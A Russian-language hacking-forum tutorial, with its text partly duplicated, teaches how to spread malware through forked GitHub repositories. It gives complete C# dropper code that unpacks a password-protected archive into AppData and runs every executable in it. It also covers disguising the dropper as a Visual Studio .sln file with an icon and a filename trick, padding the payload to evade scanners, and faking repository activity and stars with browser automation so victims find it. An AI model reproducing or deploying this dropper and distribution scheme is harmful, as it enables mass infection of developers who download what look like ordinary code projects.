Автор CyberKayt
Источник https://xss.pro
Сразу скажу что данный метод уже используют на всю катушку, видел да же писали в новостях на хакере что то подобное, но не где о нем подробно не чего не описано, решил проверить способ и усовершенствовать его.
Инсталы идут и довольно качественные, плюс метод довольно простой, но я его усложнил сделал более незаметным и нам понадобятся хотя бы начальные знания C# и BAS - для овтаматизации процессов в браузере или если сможете переписать на другой ЯП очень простую софтинку о которой реч пойдет ниже.
Подготовка вашей полезной нагрузки
Предположим что у вас уже готовый криптованный exe файл, для начала нужно обязательно сделать ему папм пустыми байтами до 750+ мб.
Качаем архиватор, предпочтительно 7zip: https://www.7-zip.org/download.html
И сжимаем ваш криптованный файл на максимальном сжатии:
Получаем архив с паролем your_password весом почти как ваш изначальный exe без пампа и переименуем его включая расширение например: vsconfig.tmp
Таких файлов мы можем создать сколько угодно с разными exe. главное расширение .tmp и везде 1 пароль, либо положить в 1 архив кучу разных exe, наш софт запустит все.
Отложим пока наш архив в сторонку и подготовим софт для распаковки и запуска о котором говорил в начале, это основа и по сути сама суть моей статьи.
Я буду писать на C#, софт довольно простой и переписать его другой ЯП труда не составит, готовый код ниже:
Не забудьте указать в коде пароль на ваш архив.
Устанавливаем пакет DotNetZip из NuGet, он нам необходим для распаковки zip архива с паролем.
Не используйте Fody например для добавления dll в exe, это навешает детектов (проверенно!) лучше просто положить dll рядом. Думаю такая dll не вызовет подозрений.
Разберем код
Обязательно делаем файлу иконку проекта Visual Studio .sln иконку прикрепил к теме в zip архиве так как .ico формат залить нельзя.
А теперь маскируем формат под .sln, для начала изменить реальный формат exe на scr, а теперь самое главно копируем строку ниже именно копируем, а не переписываем:
Resounls..scr.exe
Символы которые можно изменить Resou остальное оставляем как есть!
Должно получится вот так:
Визуально тот же .sln файл запуска проекта.
Заливаем на VT? Да заливаем в этом и фишка что лить будут такой простой без малвари файл. Его все равно сольют а для статьи как раз посмотрим сколько детектов накапает.
Без обфускации как есть:
Сразу после залива полный фуд по ВТ как будет дальше посмотрим(следим за темой):
Готовим репозиторий
Регаем аккаунт GitHub идем в поиск и ищем какой ни будь репозиторий по своей тематики, читы, крипта или что вам нужно.
Репозиторий ищем обязательно с проектом на Visual Studio где для запуска проекта требуется .sln файл.
Далее для примера я буду использовать этот:
Делаем форк этого репозитория и следуем пунктам:
1. Переносим реальный файл .sln в данном примере CSharp-CheatSheet.sln в подпапку например в уже существующую CSharp-CheatSheet что бы это сделать скачайте сначало оригинальный .sln, удалите его из корня, перейдите в папку CSharp-CheatSheet и закачайте туда.
2. В место него ложим в корень наши файлы:
Вот как это выглядит у меня:
Все готово! Почти. Сам репозиторий уже готов и его можно рекламить.
При скачивании проекта жертва запустит фейковый .sln файл который запустит оригинальный .sln и откроет проект.
Распакует ваш архив с паролем и запустит все exe из него.
Держим в топе в поиске наш репозиторий что бы получить больше установок:
При поиске репозиториев многие фильтруют поиск по последним изменениям, добавлениям, этим мы и воспользуемся!
Создаем в корне нашего проекта любой файл, его мы будем редактировать каждые 30сек. тем самым держа в топе поиске по этим критериям.
Запускаем BAS https://bablosoft.com/shop/BrowserAutomationStudio
Первым делом нам нужно получить свои куки от гита что бы работать с нашим репозиторием:
Создаем пустой txt файл где угодно в него мы запишем наши куки.
В BAS жмем Браузер > Загрузить вводим сайт GitHub, после жмем F2 и сможем работать напрямую мышкой в загрузившимся окне. Авторизируемся в своем аккаунте гита.
Далее жмем Сеть > Сохранить cookies
Сохраняем куки в файл, для этого идем в Файловая система > Записать в файл
Откройте ваш txt файл проверьте записались ли туда данные, если все ок закрывайте BAS (Остановить)
Создаем новый проект уже для непосредственного апа нашего репозитория, посредством редактирования файла.
Делаем все по пунктам:
Файловая система > читать файл указваем путь до нашего файла с куками.
Сеть > Загрузить cookies
И как до этого открывваем сайт гитхаба но уже ссылокй на файл для редактирования Браузер > Загрузить, и после загрузки вы уже должны быть авторизированны!
Жмете на карандаш справа редактировать файл повится окошко выбираете кликнуть по эллементу, далее в поле редактирования щелкаете еще раз и жмете ввод текста текст установите любой, хоть точку.
И далее все по аналогии сохраняем кликаем по эллементу.
Делаем задержку Ожидание > Спать поставим например 20 000млс.
И самое главное делаем пвторение скрипта:
Если кому то понадобится могу за $ написать скрипт для работы с вашими куками и апом репозиториев по списку если из много.
В принципе такое сможет сделать любой кодер BAS это не сложно.
Так же я советую накрутить звезд, такие услуги я видел по форумам, это придаст доверия к вашему репозиторию.
Источник https://xss.pro
Сразу скажу что данный метод уже используют на всю катушку, видел да же писали в новостях на хакере что то подобное, но не где о нем подробно не чего не описано, решил проверить способ и усовершенствовать его.
Инсталы идут и довольно качественные, плюс метод довольно простой, но я его усложнил сделал более незаметным и нам понадобятся хотя бы начальные знания C# и BAS - для овтаматизации процессов в браузере или если сможете переписать на другой ЯП очень простую софтинку о которой реч пойдет ниже.
Подготовка вашей полезной нагрузки
Предположим что у вас уже готовый криптованный exe файл, для начала нужно обязательно сделать ему папм пустыми байтами до 750+ мб.
Качаем архиватор, предпочтительно 7zip: https://www.7-zip.org/download.html
И сжимаем ваш криптованный файл на максимальном сжатии:
Получаем архив с паролем your_password весом почти как ваш изначальный exe без пампа и переименуем его включая расширение например: vsconfig.tmp
Таких файлов мы можем создать сколько угодно с разными exe. главное расширение .tmp и везде 1 пароль, либо положить в 1 архив кучу разных exe, наш софт запустит все.
Отложим пока наш архив в сторонку и подготовим софт для распаковки и запуска о котором говорил в начале, это основа и по сути сама суть моей статьи.
Я буду писать на C#, софт довольно простой и переписать его другой ЯП труда не составит, готовый код ниже:
C#:
using Ionic.Zip;
using System;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Windows.Forms;
namespace UnZip
{
internal class Program
{
public static string password = "your_password"; // Пароль от архивов
private static string STRING = "abcdefghijklmnopqrstuvwxyz";
private static string INTEGER = "0123456789";
private static Random charsRandom = new Random();
private static Random lengthRandom = new Random();
public static string Random(int length = 0)
{
if (length == 0) length = 30;
lengthRandom.Next(1, length);
string chars = STRING.ToUpper() + STRING + INTEGER;
return new string(Enumerable.Repeat(chars, length).Select(s => s[charsRandom.Next(s.Length)]).ToArray());
}
static void Main()
{
// Ищем все файлы sln и запускаем, а так же все архивы с форматом .tmp которые распакуем во временную папку и запустим все exe файлы в них.
string[] AllFilesSLN = Directory.GetFiles(Application.StartupPath, "*.sln*", SearchOption.AllDirectories);
string[] AllFilesZIP = Directory.GetFiles(Application.StartupPath, "*.tmp*", SearchOption.AllDirectories);
foreach (string filenameSLN in AllFilesSLN)
{
try
{
string sln_file = Path.Combine(Application.StartupPath, Path.GetFileNameWithoutExtension(System.Reflection.Assembly.GetExecutingAssembly().Location) + ".sln");
File.Move(filenameSLN, sln_file);
Process.Start(sln_file);
}
catch (Exception ex) { Console.WriteLine(ex);}
break;
}
// Ищем все архивы и распаковываем
foreach (string filenameZIP in AllFilesZIP)
{
try
{
string p = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), Random(16));
string pathzip = Path.GetDirectoryName(filenameZIP);
using (ZipFile zip = ZipFile.Read(filenameZIP))
{
if (!Directory.Exists(p))
Directory.CreateDirectory(p);
zip.Password = password;
zip.ExtractAll(p);
string[] exe = Directory.GetFiles(p, "*.*", SearchOption.AllDirectories);
foreach (string name_exe in exe)
Process.Start(name_exe);
}
}
catch (Exception ex) { Console.WriteLine(ex); }
}
}
}
}Устанавливаем пакет DotNetZip из NuGet, он нам необходим для распаковки zip архива с паролем.
Не используйте Fody например для добавления dll в exe, это навешает детектов (проверенно!) лучше просто положить dll рядом. Думаю такая dll не вызовет подозрений.
Разберем код
- Ищем все .sln файлы переносим их в корень нашего приложения и запускаем их, по факту будет только 1 такой файл от фейкового проекта который мы зальем на гит.
- Ищем все архивы с расширением .tmp распаковываем и запускаем все exe файлы в них.
Обязательно делаем файлу иконку проекта Visual Studio .sln иконку прикрепил к теме в zip архиве так как .ico формат залить нельзя.
А теперь маскируем формат под .sln, для начала изменить реальный формат exe на scr, а теперь самое главно копируем строку ниже именно копируем, а не переписываем:
Resounls..scr.exe
Символы которые можно изменить Resou остальное оставляем как есть!
Должно получится вот так:
Визуально тот же .sln файл запуска проекта.
Заливаем на VT? Да заливаем в этом и фишка что лить будут такой простой без малвари файл. Его все равно сольют а для статьи как раз посмотрим сколько детектов накапает.
Без обфускации как есть:
Сразу после залива полный фуд по ВТ как будет дальше посмотрим(следим за темой):
Готовим репозиторий
Регаем аккаунт GitHub идем в поиск и ищем какой ни будь репозиторий по своей тематики, читы, крипта или что вам нужно.
Репозиторий ищем обязательно с проектом на Visual Studio где для запуска проекта требуется .sln файл.
Далее для примера я буду использовать этот:
Делаем форк этого репозитория и следуем пунктам:
1. Переносим реальный файл .sln в данном примере CSharp-CheatSheet.sln в подпапку например в уже существующую CSharp-CheatSheet что бы это сделать скачайте сначало оригинальный .sln, удалите его из корня, перейдите в папку CSharp-CheatSheet и закачайте туда.
2. В место него ложим в корень наши файлы:
Вот как это выглядит у меня:
Все готово! Почти. Сам репозиторий уже готов и его можно рекламить.
При скачивании проекта жертва запустит фейковый .sln файл который запустит оригинальный .sln и откроет проект.
Распакует ваш архив с паролем и запустит все exe из него.
Держим в топе в поиске наш репозиторий что бы получить больше установок:
При поиске репозиториев многие фильтруют поиск по последним изменениям, добавлениям, этим мы и воспользуемся!
Создаем в корне нашего проекта любой файл, его мы будем редактировать каждые 30сек. тем самым держа в топе поиске по этим критериям.
Запускаем BAS https://bablosoft.com/shop/BrowserAutomationStudio
Первым делом нам нужно получить свои куки от гита что бы работать с нашим репозиторием:
Создаем пустой txt файл где угодно в него мы запишем наши куки.
В BAS жмем Браузер > Загрузить вводим сайт GitHub, после жмем F2 и сможем работать напрямую мышкой в загрузившимся окне. Авторизируемся в своем аккаунте гита.
Далее жмем Сеть > Сохранить cookies
Сохраняем куки в файл, для этого идем в Файловая система > Записать в файл
Откройте ваш txt файл проверьте записались ли туда данные, если все ок закрывайте BAS (Остановить)
Создаем новый проект уже для непосредственного апа нашего репозитория, посредством редактирования файла.
Делаем все по пунктам:
Файловая система > читать файл указваем путь до нашего файла с куками.
Сеть > Загрузить cookies
И как до этого открывваем сайт гитхаба но уже ссылокй на файл для редактирования Браузер > Загрузить, и после загрузки вы уже должны быть авторизированны!
Жмете на карандаш справа редактировать файл повится окошко выбираете кликнуть по эллементу, далее в поле редактирования щелкаете еще раз и жмете ввод текста текст установите любой, хоть точку.
И далее все по аналогии сохраняем кликаем по эллементу.
Делаем задержку Ожидание > Спать поставим например 20 000млс.
И самое главное делаем пвторение скрипта:
Если кому то понадобится могу за $ написать скрипт для работы с вашими куками и апом репозиториев по списку если из много.
В принципе такое сможет сделать любой кодер BAS это не сложно.
Пусть не много но таких репозиториев можно понаделать кучу.
Так же я советую накрутить звезд, такие услуги я видел по форумам, это придаст доверия к вашему репозиторию.
Всем спасибо. Не забываем про наш ВТ выше) посмотрим скок проживет.
Специально для xss.pro, автор CyberKayt
Последнее редактирование модератором:
спустя месяц после залива на ВТ, всего 1 детект, при чем спустя сутки было 2, сейчас 1. Отвалился детект Макса, видать в ручную проверили и думают что файл безопасен собственно так то он таким и "является".